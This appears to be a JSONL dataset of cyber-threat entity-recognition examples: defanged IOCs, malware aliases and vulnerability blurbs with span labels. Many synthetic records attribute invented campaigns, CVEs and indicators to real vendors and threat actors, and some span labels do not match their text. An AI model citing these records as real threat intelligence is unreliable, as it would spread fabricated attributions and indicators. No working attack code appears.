] 227, the Rapid7 IR team identified Gootloader running as C:\\Users\\admin\\Downloads\\svchost.exe. The threat actor, believed to be Turla, used Metasploit for credential harvesting and Burp Suite for lateral movement. Exfiltrated data was sent to sync-login[.]net and edge-node[.]link. The initial dropper (SHA1: 057b8eafab20c3e2af169470e2becbae2a3e3c97) was delivered via a phishing email from billing@phishing-domain[.]com. A second C2 node was observed at 172[.]132[.]54[.]237, with a persistence mechanism writing to C:\\Users\\admin\\AppData\\Local\\Temp\\dropper.ps1.", "spans": {"Indicator: 125.224.114.227": [[64, 97]], "Organization: Rapid7": [[103, 109]], "Malware: Gootloader": [[129, 139]], "Indicator: sync-login.net": [[337, 353]], "Indicator: edge-node.link": [[358, 374]], "Indicator: 057b8eafab20c3e2af169470e2becbae2a3e3c97": [[403, 443]], "Indicator: billing@phishing-domain.com": [[485, 514]], "Indicator: 172.132.54.237": [[549, 569]]}, "info": {"id": "synth_v2_00429", "source": "defanged_augment"}} {"text": "Trend Micro detected a multi-stage attack chain. The initial phishing email from alert@phishing-domain[ . ]com contained a link to hxxps://secure-auth[.]club/callback. This redirected to hxxps://secure-cdn[.]tech/callback on logincloud[ . ]site. A secondary email from support@account-update[ . ]xyz pointed to hxxp://cdnportal[.]dev/admin/config which delivered Cobalt Strike. The final payload callback was hxxps://storage-edge[ . ]io/portal/verify resolving to 192 [ . ] 192 [ . ] 251 [ . 
] 104 via cachesync[.]net.", "spans": {"Organization: Trend Micro": [[0, 11]], "Indicator: alert@phishing-domain.com": [[81, 110]], "Indicator: https://secure-auth.club/callback": [[131, 166]], "Indicator: hxxps://secure-cdn.tech/callback": [[187, 221]], "Indicator: logincloud.site": [[225, 244]], "Indicator: support@account-update.xyz": [[269, 299]], "Indicator: http://cdnportal.dev/admin/config": [[311, 346]], "Malware: Cobalt Strike": [[363, 376]], "Indicator: https://storage-edge.io/portal/verify": [[409, 450]], "Indicator: 192.192.251.104": [[464, 497]], "Indicator: cachesync.net": [[502, 517]]}, "info": {"id": "synth_v2_01838", "source": "defanged_augment"}} {"text": "Artifact Analysis for BlackCat campaign:\nStage 1 dropper at C:\\Windows\\Tasks\\helper.sh - SHA256: 640a97f94a3ac1e0811517f9f39a4a12ae08219a956019a463e072ab2e26838f\nStage 2 loader at C:\\Users\\Public\\Documents\\lsass.dmp - SHA1: 587f425dcf610f037b556aafd402842a7712c79d\nFinal payload at /tmp/helper.sh - SHA1: e77ef94cf33dea9f8d97c062da655c970346b606\nExfiltration module - SHA256: 1c13f53bc228670d512451a477167e756f7a3109b010fc97f20317e954756bb7\nAll stages communicated with 10[.]254[.]87[.]79. 
Burp Suite signatures detected in Stage 2.", "spans": {"Malware: BlackCat": [[22, 30]], "Indicator: 640a97f94a3ac1e0811517f9f39a4a12ae08219a956019a463e072ab2e26838f": [[97, 161]], "Indicator: 587f425dcf610f037b556aafd402842a7712c79d": [[224, 264]], "Indicator: e77ef94cf33dea9f8d97c062da655c970346b606": [[305, 345]], "Indicator: 1c13f53bc228670d512451a477167e756f7a3109b010fc97f20317e954756bb7": [[376, 440]], "Indicator: 10.254.87.79": [[470, 488]]}, "info": {"id": "synth_v2_01937", "source": "defanged_augment"}} {"text": "A backdoor also known as: JS:Trojan.JS.Redirector.BS JS[.]Redirector[.]DE JS:Trojan.JS.Redirector.BS JS/Redir.WI Trojan.Malscript!html JS:Trojan.JS.Redirector.BS JS:Trojan.JS.Redirector.BS Trojan.Script.Expack.drqfka JS:Trojan.JS.Redirector.BS JS:Trojan.JS.Redirector.BS BehavesLike.PDF.Trojan.db JS/Redir.WI TrojanDownloader.JS.aufd JS/Redirector.OA.1 JS:Trojan.JS.Redirector.BS", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: JS.Redirector.DE": [[53, 73]]}, "info": {"id": "cyner2_train_005423", "source": "defanged_augment"}} {"text": "Customers have to send a set text message from their phone to a specific bank number . Skipper , which has been linked to Turla in the past , was found alongside Gazer in most cases we investigated . Winnti : C&C : b[org_name][.]dnslookup[.]services : 443 . 
Organizations can collect this intelligence , review the threats described , consider if and how the threat is relevant to them , and the necessity of making any potential additional mitigations .", "spans": {"Indicator: b[org_name].dnslookup.services": [[215, 249]], "Organization: Organizations": [[258, 271]]}, "info": {"id": "cyberner_stix_train_004216", "source": "defanged_augment"}} {"text": "The malicious document – Hotel_Reservation_Form[.]doc ( MD5 : 9b10685b774a783eabfecdb6119a8aa3 ) , contains a macro that base64 decodes a dropper that then deploys APT28 ’s signature GAMEFISH malware ( MD5 : 1421419d1be31f1f9ea60e8ed87277db ) , which uses mvband[.]net and mvtband[.]net as command and control ( C2 ) domains .", "spans": {"Indicator: Hotel_Reservation_Form.doc": [[25, 53]], "Indicator: 9b10685b774a783eabfecdb6119a8aa3": [[62, 94]], "Malware: GAMEFISH": [[183, 191]], "Indicator: 1421419d1be31f1f9ea60e8ed87277db": [[208, 240]], "Indicator: mvband.net": [[256, 268]], "Indicator: mvtband.net": [[273, 286]]}, "info": {"id": "cyberner_stix_train_006683", "source": "defanged_augment"}} {"text": "Malware Analysis Report: BatLoader (MD5: 871b258a3b957b58be76ab0289ae84db). Upon execution on Citrix NetScaler, the sample creates /home/user/.config/implant.so and injects into legitimate processes. Network analysis shows beaconing to 172[.]140[.]198[.]206 every 60 seconds and DNS queries to sync-cache[.]net. The second stage was fetched from hxxp://securerelay[.]info/login and written to /opt/app/bin/ntds.dit. The payload uses Metasploit-style techniques for defense evasion. 
A secondary hash (SHA256: 4f9f9d9f947a8457211b27ec145af1de85f10717333923d522cd6716fa4d5b36) was extracted from the unpacked payload.", "spans": {"Malware: BatLoader": [[25, 34]], "Indicator: 871b258a3b957b58be76ab0289ae84db": [[41, 73]], "System: Citrix NetScaler": [[94, 110]], "Indicator: 172.140.198.206": [[236, 257]], "Indicator: sync-cache.net": [[294, 310]], "Indicator: hxxp://securerelay.info/login": [[346, 377]], "Indicator: 4f9f9d9f947a8457211b27ec145af1de85f10717333923d522cd6716fa4d5b36": [[508, 572]]}, "info": {"id": "synth_v2_00578", "source": "defanged_augment"}} {"text": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Studio Photo 3 [ . ] 6 [ . ] 6 [ . ] 922. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of NEF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11194.", "spans": {"Indicator: 3.6.6.922": [[117, 144]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-17421"}} {"text": "Blog Post by Palo Alto Unit 42: Tracking Volt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-46781 against SonicWall SMA deployments. The initial access vector involves spear-phishing emails from billing@account-update[.]xyz delivering PlugX. Post-compromise, the attackers deploy Raccoon Stealer and use Seatbelt for reconnaissance. C2 infrastructure includes 39[.]207[.]177[.]139 and cloudportal[.]live. A staging server at hxxp://login-mail[ . ]xyz/panel/index.html hosts additional tooling. 
Key artifact: C:\\Users\\admin\\AppData\\Local\\Temp\\implant.so (MD5: 171dd901e782e4020d65d365798562b6).", "spans": {"Organization: Palo Alto Unit 42": [[13, 30]], "Vulnerability: CVE-2020-46781": [[133, 147]], "System: SonicWall SMA": [[156, 169]], "Indicator: billing@account-update.xyz": [[245, 273]], "Malware: PlugX": [[285, 290]], "Malware: Raccoon Stealer": [[330, 345]], "Indicator: 39.207.177.139": [[410, 430]], "Indicator: cloudportal.live": [[435, 453]], "Indicator: http://login-mail.xyz/panel/index.html": [[475, 517]], "Indicator: 171dd901e782e4020d65d365798562b6": [[609, 641]]}, "info": {"id": "synth_v2_01645", "source": "defanged_augment"}} {"text": "Haniyeh_will_remain_abroad_and_Hamas_rises_in_Gaza[ . ]pdf : 5b476e05aacea9edc14f7e4bab1b724ef54915f30c39ac87503ed395feae611e .", "spans": {"Indicator: Haniyeh_will_remain_abroad_and_Hamas_rises_in_Gaza.pdf": [[0, 58]], "Indicator: 5b476e05aacea9edc14f7e4bab1b724ef54915f30c39ac87503ed395feae611e": [[61, 125]]}, "info": {"id": "cyberner_stix_train_005533", "source": "defanged_augment"}} {"text": "Tap Menu > Play Protect . Based on data collected from Palo Alto Networks AutoFocus threat intelligence , we discovered continued operations of activity very similar to the Roaming Tiger attack campaign that began in the August 2015 timeframe , with a concentration of attacks in late October and continuing into December . The sole indicator on the source host that at[ . ]exe had been run was an application Prefetch file ( C:\\Windows\\Prefetch\\AT[.]EXE-BB02E639[.]pf ) that was created when the tool was executed . 
The Metasploit code was released on December 29 , 2012 and the vulnerability was officialy fixed on January 14 , 2013 ( MS13 - 008 ) while the page with the exploit was uploaded on February 11 , 2013 .", "spans": {"Organization: Palo Alto Networks AutoFocus": [[55, 83]], "Indicator: at.exe": [[367, 377]], "Indicator: C:\\Windows\\Prefetch\\AT.EXE-BB02E639.pf": [[426, 468]], "Vulnerability: vulnerability": [[580, 593]]}, "info": {"id": "cyberner_stix_train_007654", "source": "defanged_augment"}} {"text": "According to the public information, cfm[ . ]com[ . ]ua domain belongs to the «Crystal Finance Millennium» software developer.", "spans": {"Organization: the «Crystal Finance Millennium» software developer.": [[74, 126]], "Indicator: cfm.com.ua": [[37, 55]]}, "info": {"id": "cyner2_train_003344", "source": "defanged_augment"}} {"text": "A backdoor also known as: W32.WinwebA.Trojan TrojanDropper.Henbang.A6 Win32.Worm.AutoRun.c W32/Adware.PXAH-3010 W32[ . ]Virut[ . ]CF Win32/SillyBHO.OL Worm.Win32.AutoRun.ibh Trojan.Win32.AutoRun.cqpmwl Trojan.MulDrop.32523 BehavesLike.Win32.AdwareBetterSurf.gh W32/Adware.ACXN Win32.Virut.cr.61440 TrojanDropper:Win32/Henbang.A Worm.Win32.AutoRun.ibh Win32.Trojan.Webdat.A Worm/Win32.AutoRun.R56346 Backdoor.WinNT.PcClient Win32/Worm.FakeFolder.FF", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.Virut.CF": [[112, 132]]}, "info": {"id": "cyner2_train_005220", "source": "defanged_augment"}} {"text": "IOC Bulletin - NjRAT Campaign:\nNetwork Indicators:\n- 192 [ . ] 141 [ . ] 160 [ . ] 215\n- 169 [ . ] 150 [ . ] 152 [ . ] 111\n- 197 [ . ] 164 [ . ] 73 [ . ] 61\n- update-sync[.]net\n- securebackup[.]live\nURLs:\n- hxxps://proxyedge[ . ]tech/portal/verify\n- hxxp://updateapi[.]io/gate.php\nEmail Senders:\n- report@auth-check[ . ]org\n- support@secure-verify[ . 
]net\nFile Indicators:\n- SHA256: 07d74d8ab071f8be242bc15510b1edb860eb63b7a8426caceaad63213336f6df\n- SHA1: 7ca699f631f3ccebf72fe1da8c479403d7ed80c4\n- Drop path: /home/user/.config/lsass.dmp", "spans": {"Malware: NjRAT": [[15, 20]], "Indicator: 192.141.160.215": [[53, 86]], "Indicator: 169.150.152.111": [[89, 122]], "Indicator: 197.164.73.61": [[125, 156]], "Indicator: update-sync.net": [[159, 176]], "Indicator: securebackup.live": [[179, 198]], "Indicator: https://proxyedge.tech/portal/verify": [[207, 247]], "Indicator: http://updateapi.io/gate.php": [[250, 280]], "Indicator: report@auth-check.org": [[298, 323]], "Indicator: support@secure-verify.net": [[326, 355]], "Indicator: 07d74d8ab071f8be242bc15510b1edb860eb63b7a8426caceaad63213336f6df": [[383, 447]], "Indicator: 7ca699f631f3ccebf72fe1da8c479403d7ed80c4": [[456, 496]]}, "info": {"id": "synth_v2_01460", "source": "defanged_augment"}} {"text": "A backdoor also known as: JS/Iframe.DGS Script.Trojan-Downloader.IFrame.AE Trojan-Downloader.JS.Iframe.deg Trojan.Script.Expack.bvtkmp PDF.DownLoader.3 BehavesLike.PDF.BadFile.db JS/BlacoleRef[ . 
]CZ.29 Trojan[Downloader]/JS.Iframe.deg Trojan-Downloader.JS.Iframe.deg JS/Moat.241E54F!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BlacoleRef.CZ": [[182, 199]]}, "info": {"id": "cyner2_train_004650", "source": "defanged_augment"}} {"text": "A backdoor also known as: W32.ShitOverVBx.PE Trojan.Win32.Cosmu!O W32.Lamer.EL3 Trojan.Downloader Downloader.VB.Win32.9689 Troj.Downloader.W32.VB.l4ji Trojan/Downloader.VB.eex TROJ_DLOADR.SMM Win32.Virus.VBbind.a W32/Worm.BAOX W32.Besverit Win32/VB.P TROJ_DLOADR.SMM Virus.Win32.Lamer.el Trojan.Win32.VB.csnpye Worm.Win32.VB.kp Win32.HLLW.Autoruner.6014 BehavesLike.Win32.Dropper.rh W32/Worm.EMYS-2108 Trojan/VB.kro WORM/VB.NVA Virus/Win32.Lamer.el Trojan:Win32/Dorv.A Trojan.Win32.Downloader.90650.B Virus.Win32.Lamer.el Win32.Application.Unwanted.B Dropper/Win32.Cosmu.R14017 SIM.Trojan.VBO.0859 Trojan.Cosmu Win32/AutoRun[.]VB[.]JP Worm.VB.FMYJ Worm.Win32 W32/OverDoom.A Worm.Win32.VB.C", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: AutoRun.VB.JP": [[617, 634]]}, "info": {"id": "cyner2_train_005360", "source": "defanged_augment"}} {"text": "PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries . The C&C server ( 82 [ . ] 137 [ . ] 255 [ . 
] 56 ) used by the above backdoors was used by APT-C-27 ( Goldmouse ) many times since 2017 .", "spans": {"Organization: Government": [[106, 116]], "Organization: Defense": [[119, 126]], "Organization: Research": [[129, 137]], "Organization: Technology sectors": [[144, 162]], "Organization: US Defense": [[217, 227]], "Organization: satellite": [[241, 250]], "Organization: aerospace industries": [[255, 275]], "Indicator: 82.137.255.56": [[295, 326]]}, "info": {"id": "cyberner_stix_train_006833", "source": "defanged_augment"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 BehavesLike[ . ]Win32[ . ]Trojan[ . ]cc TR/Crypt.ZPACK.oltlq Trojan.Barys.DD8C9 HackTool:Win64/Mimikatz.A Win-Trojan/MSILKrypt02.Exp Trojan.MSIL.Inject MSIL/Injector.QOT!tr Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Trojan.cc": [[69, 108]]}, "info": {"id": "cyner2_train_005484", "source": "defanged_augment"}} {"text": "Cisco Talos published a threat intelligence report linking Scattered Spider to a new campaign exploiting CVE-2026-49052 in Atlassian Confluence. The attackers deployed StealC via WinPEAS, establishing C2 communication with 172[.]163[.]149[.]189 and portalmail[ . ]net. A secondary payload was downloaded from hxxps://cache-edge[.]org/assets/js/payload.js. The malware binary (MD5: 79798afe27b70af8dab3fb741dab7633) was dropped to /tmp/sam.hive. Phishing emails were sent from finance@secure-verify[ . ]net targeting enterprise users. 
A backup C2 server was identified at 148[.]124[.]166[.]97.", "spans": {"Organization: Cisco Talos": [[0, 11]], "Vulnerability: CVE-2026-49052": [[105, 119]], "System: Atlassian Confluence": [[123, 143]], "Malware: StealC": [[168, 174]], "Indicator: 172.163.149.189": [[223, 244]], "Indicator: portalmail.net": [[249, 267]], "Indicator: hxxps://cache-edge.org/assets/js/payload.js": [[309, 354]], "Indicator: 79798afe27b70af8dab3fb741dab7633": [[381, 413]], "Indicator: finance@secure-verify.net": [[476, 505]], "Indicator: 148.124.166.97": [[571, 591]]}, "info": {"id": "synth_v2_00089", "source": "defanged_augment"}} {"text": "Sophos X-Ops published a threat intelligence report linking APT29 to a new campaign exploiting CVE-2026-35009 in Juniper SRX. The attackers deployed BlackCat via WinPEAS, establishing C2 communication with 39 [ . ] 71 [ . ] 167 [ . ] 239 and nodenode[.]io. A secondary payload was downloaded from hxxps://cachebackup[ . ]online/secure/token. The malware binary (MD5: ff480f115c2f9a8bfc917fd06825c91f) was dropped to C:\\Users\\Public\\Documents\\ntds.dit. Phishing emails were sent from notification@mail-service[.]info targeting enterprise users. A backup C2 server was identified at 42[.]201[.]153[.]152.", "spans": {"Organization: Sophos X-Ops": [[0, 12]], "Vulnerability: CVE-2026-35009": [[95, 109]], "System: Juniper SRX": [[113, 124]], "Malware: BlackCat": [[149, 157]], "Indicator: 39.71.167.239": [[206, 237]], "Indicator: nodenode.io": [[242, 255]], "Indicator: hxxps://cachebackup.online/secure/token": [[297, 340]], "Indicator: ff480f115c2f9a8bfc917fd06825c91f": [[367, 399]], "Indicator: notification@mail-service.info": [[483, 515]], "Indicator: 42.201.153.152": [[581, 601]]}, "info": {"id": "synth_v2_00066", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 96 [ . ] 27 [ . ] 54 [ . ] 170, the Microsoft MSRC IR team identified LockBit running as C:\\Program Files\\Common Files\\payload.bin. 
The threat actor, believed to be Volt Typhoon, used LinPEAS for credential harvesting and Mimikatz for lateral movement. Exfiltrated data was sent to loginapi[.]xyz and update-cache[.]live. The initial dropper (SHA1: 92b21d33d60cb17cc016bb67c04dc86ef88569c1) was delivered via a phishing email from account@mail-service[ . ]info. A second C2 node was observed at 172 [ . ] 80 [ . ] 15 [ . ] 38, with a persistence mechanism writing to C:\\Users\\admin\\Downloads\\beacon.dll.", "spans": {"Indicator: 96.27.54.170": [[64, 94]], "Organization: Microsoft MSRC": [[100, 114]], "Malware: LockBit": [[134, 141]], "Indicator: loginapi.xyz": [[346, 360]], "Indicator: update-cache.live": [[365, 384]], "Indicator: 92b21d33d60cb17cc016bb67c04dc86ef88569c1": [[413, 453]], "Indicator: account@mail-service.info": [[495, 524]], "Indicator: 172.80.15.38": [[559, 589]]}, "info": {"id": "synth_v2_00365", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2023-14679 is a critical use-after-free affecting Windows 11. ESET Research confirmed active exploitation by Aqua Blizzard in the wild. Exploitation delivers Qbot (SHA256: 7f34fe03dacea410e58a7dc58ae2341cabea11bd32d2b8538da43599cd053d6d) which is dropped to C:\\Users\\admin\\Downloads\\config.dat. The exploit payload is hosted at hxxp://edgeauth[.]dev/gate.php and communicates to 53[.]128[.]52[.]102 for C2.", "spans": {"Vulnerability: CVE-2023-14679": [[24, 38]], "Vulnerability: use-after-free": [[53, 67]], "System: Windows 11": [[78, 88]], "Organization: ESET Research": [[90, 103]], "Malware: Qbot": [[186, 190]], "Indicator: 7f34fe03dacea410e58a7dc58ae2341cabea11bd32d2b8538da43599cd053d6d": [[200, 264]], "Indicator: hxxp://edgeauth.dev/gate.php": [[356, 386]], "Indicator: 53.128.52.102": [[407, 426]]}, "info": {"id": "synth_v2_00682", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Merlin artifacts at C:\\ProgramData\\svchost.exe. 
Memory dump analysis confirmed execution of GhostPack. Registry modifications pointed to persistence via C:\\Program Files\\Common Files\\csrss.exe. Network forensics identified connections to 80[.]173[.]129[.]97 and api-backup[.]com. Email headers traced the initial vector to info@account-update[ . ]xyz. File C:\\Windows\\Tasks\\helper.sh (MD5: c211ee1e68447fe7d7870f46fbdacbb7) was identified as the initial dropper. A staging URL hxxps://cloud-api[ . ]cc/secure/token resolved to 192[.]176[.]62[.]7. Secondary artifact hash: SHA256: 8a5cc2effcc53140675759b5f3e5a15769f1b7faffbcd1d4121b3bfb95ac9363.", "spans": {"Indicator: 80.173.129.97": [[310, 329]], "Indicator: api-backup.com": [[334, 350]], "Indicator: info@account-update.xyz": [[395, 422]], "Indicator: c211ee1e68447fe7d7870f46fbdacbb7": [[462, 494]], "Indicator: https://cloud-api.cc/secure/token": [[549, 586]], "Indicator: 192.176.62.7": [[599, 617]], "Indicator: 8a5cc2effcc53140675759b5f3e5a15769f1b7faffbcd1d4121b3bfb95ac9363": [[652, 716]]}, "info": {"id": "synth_v2_01190", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan.Win32.Rimecud.1!O Trojan.Rimecud.U TROJ_RIMECUD.SMX Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_RIMECUD.SMX Trojan.Win32.Fsysna.eqph TrojWare.Win32.Kryptik.AMMN BehavesLike[ . ]Win32[ . ]PWSZbot[ . ]ch Virus.Win32.Cryptor Ransom:Win32/Grymegat.A Trojan.Kazy.D16E7F Trojan.Win32.Fsysna.eqph Trojan/Win32.Jorik.R40701 Trj/Rimecud.f W32/Rimecud.GRC!tr Win32/Trojan.801", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.PWSZbot.ch": [[198, 238]]}, "info": {"id": "cyner2_train_002777", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRevert \"libfs: fix infinite directory reads for offset dir\"\n\nThe current directory offset allocator (based on mtree_alloc_cyclic)\nstores the next offset value to return in octx->next_offset. 
This\nmechanism typically returns values that increase monotonically over\ntime. Eventually, though, the newly allocated offset value wraps\nback to a low number (say, 2) which is smaller than other already-\nallocated offset values.\n\nYu Kuai reports that, after commit 64a7ce76fb90\n(\"libfs: fix infinite directory reads for offset dir\"), if a\ndirectory's offset allocator wraps, existing entries are no longer\nvisible via readdir/getdents because offset_readdir() stops listing\nentries once an entry's offset is larger than octx->next_offset.\nThese entries vanish persistently -- they can be looked up, but will\nnever again appear in readdir(3) output.\n\nThe reason for this is that the commit treats directory offsets as\nmonotonically increasing integer values rather than opaque cookies,\nand introduces this comparison:\n\n\tif (dentry2offset(dentry) >= last_index) {\n\nOn 64-bit platforms, the directory offset value upper bound is\n2^63 - 1. Directory offsets will monotonically increase for millions\nof years without wrapping.\n\nOn 32-bit platforms, however, LONG_MAX is 2^31 - 1. The allocator\ncan wrap after only a few weeks (at worst).\n\nRevert commit 64a7ce76fb90 (\"libfs: fix infinite directory reads for\noffset dir\") to prepare for a fix that can work properly on 32-bit\nsystems and might apply to recent LTS kernels where shmem employs\nthe simple_offset mechanism.", "spans": {"Indicator: huawei.com": [[508, 520]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-57952"}} {"text": "TensorFlow is an end-to-end open source platform for machine learning. The implementation of `tf.raw_ops.MaxPoolGrad` is vulnerable to a heap buffer overflow. The implementation(hxxps://github[.]com/tensorflow/tensorflow/blob/ab1e644b48c82cb71493f4362b4dd38f4577a1cf/tensorflow/core/kernels/maxpooling_op.cc#L194-L203) fails to validate that indices used to access elements of input/output arrays are valid. 
Whereas accesses to `input_backprop_flat` are guarded by `FastBoundsCheck`, the indexing in `out_backprop_flat` can result in OOB access. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/ab1e644b48c82cb71493f4362b4dd38f4577a1cf/tensorflow/core/kernels/maxpooling_op.cc#L194-L203": [[178, 317]], "Vulnerability: buffer overflow": [[142, 157]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-29579"}} {"text": "Malware Analysis Report: Qbot (SHA256: 64f55ce017bf221672e98bc8e0d260c6c69297176c46b376cab60596ea4cb137). Upon execution on Ubuntu 22.04, the sample creates /etc/cron.d/payload.bin and injects into legitimate processes. Network analysis shows beaconing to 4[.]157[.]81[.]87 every 60 seconds and DNS queries to staticgateway[ . ]cc. The second stage was fetched from hxxps://static-login[ . ]io/secure/token and written to /etc/cron.d/shell.php. The payload uses PowerShell Empire-style techniques for defense evasion. A secondary hash (MD5: 7b6a675c5c4a58104ce84f59432e9ce4) was extracted from the unpacked payload.", "spans": {"Malware: Qbot": [[25, 29]], "Indicator: 64f55ce017bf221672e98bc8e0d260c6c69297176c46b376cab60596ea4cb137": [[39, 103]], "System: Ubuntu 22.04": [[124, 136]], "Indicator: 4.157.81.87": [[256, 273]], "Indicator: staticgateway.cc": [[310, 330]], "Indicator: https://static-login.io/secure/token": [[366, 406]], "Indicator: 7b6a675c5c4a58104ce84f59432e9ce4": [[541, 573]]}, "info": {"id": "synth_v2_00554", "source": "defanged_augment"}} {"text": "These services appear to be running on all network interfaces and are therefore accessible to anyone sharing a local network with an infected device . 
The certificates Blackfly stole were also from South Korean companies , primarily in the video game and software development industry . Describes a resolution by the Asian Parliamentary Assembly ( APA ) held in Anatalya , announcing unlimited support for the Palestinian people 7b4c736b92ce702fb584845380e237aa55ddb4ef693ea65a766c9d9890b3852c . jalsa[.]rar : The attackers behind Earth Vetala use features of remote access software to steal sensitive information or download malware for additional cyber operations , leveraging spearphishing emails and lure documents containing embedded links to a legitimate filesharing service Onehub to distribute archives containing the ScreenConnect remote administrator tool and RemoteUtilities software .", "spans": {"Organization: companies": [[211, 220]], "Organization: video game and software development industry": [[240, 284]], "Organization: Asian Parliamentary Assembly": [[317, 345]], "Organization: APA": [[348, 351]], "Indicator: 7b4c736b92ce702fb584845380e237aa55ddb4ef693ea65a766c9d9890b3852c": [[429, 493]], "Indicator: jalsa.rar": [[496, 507]]}, "info": {"id": "cyberner_stix_train_004611", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2021-28231 is a critical privilege escalation affecting Apache Struts. Google TAG confirmed active exploitation by OilRig in the wild. Exploitation delivers RemcosRAT (SHA1: b325133fdedd0c4e671ac2fde32b98dd59cc2275) which is dropped to C:\\Windows\\System32\\payload.bin. The exploit payload is hosted at hxxps://nodelogin[ . ]dev/login and communicates to 10 [ . ] 145 [ . ] 11 [ . 
] 203 for C2.", "spans": {"Vulnerability: CVE-2021-28231": [[24, 38]], "Vulnerability: privilege escalation": [[53, 73]], "System: Apache Struts": [[84, 97]], "Organization: Google TAG": [[99, 109]], "Malware: RemcosRAT": [[185, 194]], "Indicator: b325133fdedd0c4e671ac2fde32b98dd59cc2275": [[202, 242]], "Indicator: https://nodelogin.dev/login": [[330, 361]], "Indicator: 10.145.11.203": [[382, 413]]}, "info": {"id": "synth_v2_00720", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Zscaler ThreatLabz identified a large-scale phishing operation. Emails originated from confirm@secure-verify[.]net and finance@auth-check[ . ]org, spoofing legitimate services. Victims were directed to hxxps://backuprelay[ . ]club/wp-content/uploads/doc.php which hosted a credential harvesting page on static-auth[ . ]dev. A secondary link hxxps://updateauth[ . ]cc/secure/token delivered Dridex (MD5: 16980bdfc57b526c6c1fabe7989f8be5). The malware was saved to /dev/shm/ntds.dit and established C2 with 183[.]219[.]174[.]15.", "spans": {"Organization: Zscaler ThreatLabz": [[26, 44]], "Indicator: confirm@secure-verify.net": [[113, 140]], "Indicator: finance@auth-check.org": [[145, 171]], "Indicator: https://backuprelay.club/wp-content/uploads/doc.php": [[228, 283]], "Indicator: static-auth.dev": [[329, 348]], "Indicator: https://updateauth.cc/secure/token": [[367, 405]], "Malware: Dridex": [[416, 422]], "Indicator: 16980bdfc57b526c6c1fabe7989f8be5": [[429, 461]], "Indicator: 183.219.174.15": [[531, 551]]}, "info": {"id": "synth_v2_01071", "source": "defanged_augment"}} {"text": "The executable file , xxxx[.]exe in this case , is then executed .", "spans": {"Indicator: xxxx.exe": [[22, 32]]}, "info": {"id": "cyberner_stix_train_005207", "source": "defanged_augment"}} {"text": "Kirby is a content management system. A vulnerability in versions prior to 3[.]5[.]8[.]3, 3 [ . ] 6 [ . ] 6 [ . ] 3, 3 [ . ] 7 [ . ] 5 [ . 
] 2, 3[.]8[.]4[.]1, and 3.9.6 affects all Kirby sites that might have potential attackers in the group of authenticated Panel users or that allow external visitors to upload an arbitrary file to the content folder. Kirby sites are not affected if they don't allow file uploads for untrusted users or visitors or if the file extensions of uploaded files are limited to a fixed safe list. The attack requires user interaction by another user or visitor and cannot be automated.\n\nAn editor with write access to the Kirby Panel could upload a file with an unknown file extension like `.xyz` that contains HTML code including harmful content like `